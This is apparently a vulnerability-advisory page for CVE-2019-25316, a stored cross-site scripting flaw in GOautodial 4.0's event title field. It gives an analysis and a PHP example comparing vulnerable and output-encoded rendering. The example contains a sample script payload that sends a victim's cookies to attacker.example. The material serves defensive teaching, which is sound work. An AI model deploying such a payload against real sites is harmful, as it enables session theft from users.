VYPR
Medium severity (6.4) · NVD Advisory · Published Feb 11, 2026 · Updated Apr 15, 2026

CVE-2019-25316

Description

GOautodial 4.0 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the event title parameter. Attackers can exploit the CreateEvent.php endpoint by sending crafted POST requests with XSS payloads to execute arbitrary JavaScript in victim browsers.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

GOautodial 4.0 has a persistent XSS vulnerability in CreateEvent.php allowing authenticated attackers to inject arbitrary JavaScript via the event title parameter.

Vulnerability

Analysis: CVE-2019-25316

What the vulnerability is

CVE-2019-25316 is a persistent (stored) cross-site scripting (XSS) vulnerability in GOautodial 4.0, an open-source contact center suite. The flaw resides in the CreateEvent.php endpoint: the title parameter is neither validated on input nor HTML-encoded on output, so a submitted value is stored verbatim and later written into the page that displays the event. An authenticated attacker can therefore store arbitrary JavaScript that executes in the browser of any other user who views the event [1][2].

How it is exploited

An attacker must first authenticate to the GOautodial application. They can then send a crafted POST request to /php/CreateEvent.php with a script payload in the title field. No privileges beyond a standard user account are required. Because the title is persisted server-side, the payload fires every time a user, including an administrator, loads the page that renders the event, with no further action from the attacker [3].

Impact

Successful exploitation runs attacker-controlled JavaScript in the context of the victim's session. This can lead to session hijacking, defacement, redirection to malicious sites, theft of sensitive information displayed in the application, or requests issued to the application with the victim's privileges (an administrator's, if an administrator views the event). Since the XSS is persistent, a single stored payload affects every user who views it over time, without repeated exploitation [2].

Mitigation

The cited references report that the vendor acknowledged the vulnerability and that a fix is available in the project's GitHub repository; users should update to the latest version of GOautodial [1][2]. No workarounds are documented. The control that actually prevents this class of bug is output encoding: HTML-entity-encoding the title wherever it is rendered (and, if it is placed inside an attribute or a script block, encoding for that context). Input validation on the title (length and character-set limits) narrows the attack surface but is not sufficient on its own, since a title such as a product name may legitimately contain characters like < or &.
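The store-then-render flow described under "How it is exploited" and the output-encoding fix named above, as an added PHP example. This is not GOautodial's code: the function names, the in-memory event list standing in for the database, and the sample payload are constructed here to show the pattern; the real CreateEvent.php handler and the page that renders event titles are not reproduced. The example assumes PHP with the mbstring extension for mb_strlen.

```php
<?php
// Added example, not GOautodial's code. Shows the bug class behind
// CVE-2019-25316 (an event title stored verbatim and echoed into HTML)
// beside a hardened version. All names and the payload are constructed.
declare(strict_types=1);

// Constructed sample: an event title an authenticated user might submit.
$submittedTitle = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Minimal in-memory stand-in for the events table.
$events = [];

// --- Vulnerable pattern: store the raw title, echo it unencoded -------------
function createEventVulnerable(array &$events, string $title): void
{
    $events[] = ['title' => $title];
}

function renderEventsVulnerable(array $events): string
{
    $html = '';
    foreach ($events as $event) {
        // Raw interpolation: a stored <script> tag is emitted as markup and runs
        // in every viewer's browser.
        $html .= '<li>' . $event['title'] . '</li>';
    }
    return $html;
}

// --- Hardened pattern: validate on input, encode on output -------------------
function validateTitle(string $title): string
{
    // Length and character policy for a calendar title. This narrows the
    // attack surface but is not the XSS defence by itself.
    $title = trim($title);
    if ($title === '' || mb_strlen($title, 'UTF-8') > 120) {
        throw new InvalidArgumentException('title must be 1-120 characters');
    }
    // Reject control characters. Printable characters such as < > & " are
    // allowed here because output encoding (below) makes them inert.
    if (preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', $title)) {
        throw new InvalidArgumentException('title contains control characters');
    }
    return $title;
}

function createEventHardened(array &$events, string $title): void
{
    $events[] = ['title' => validateTitle($title)];
}

function escapeHtml(string $value): string
{
    // ENT_QUOTES escapes both quote styles so the value is also safe inside
    // attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
    // silently returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderEventsHardened(array $events): string
{
    $html = '';
    foreach ($events as $event) {
        // Encode at the point of output, in the HTML element context.
        $html .= '<li>' . escapeHtml($event['title']) . '</li>';
    }
    return $html;
}

// --- Demonstration -----------------------------------------------------------
createEventVulnerable($events, $submittedTitle);
echo "Vulnerable rendering:\n", renderEventsVulnerable($events), "\n\n";

$events = [];
createEventHardened($events, $submittedTitle);
echo "Hardened rendering:\n", renderEventsHardened($events), "\n";
// The hardened output contains &lt;script&gt; ... &lt;/script&gt;, which the
// browser displays as text rather than executing.
```

The encoder's charset must match what the page actually declares, so the response should also carry `Content-Type: text/html; charset=UTF-8`; a mismatch lets some browsers reinterpret encoded bytes. If the same title is later written into a JavaScript string or an HTML attribute, encode for that context separately; the element-context encoding shown here is not sufficient there.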

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 3

News mentions: 0 (no linked articles in the index yet)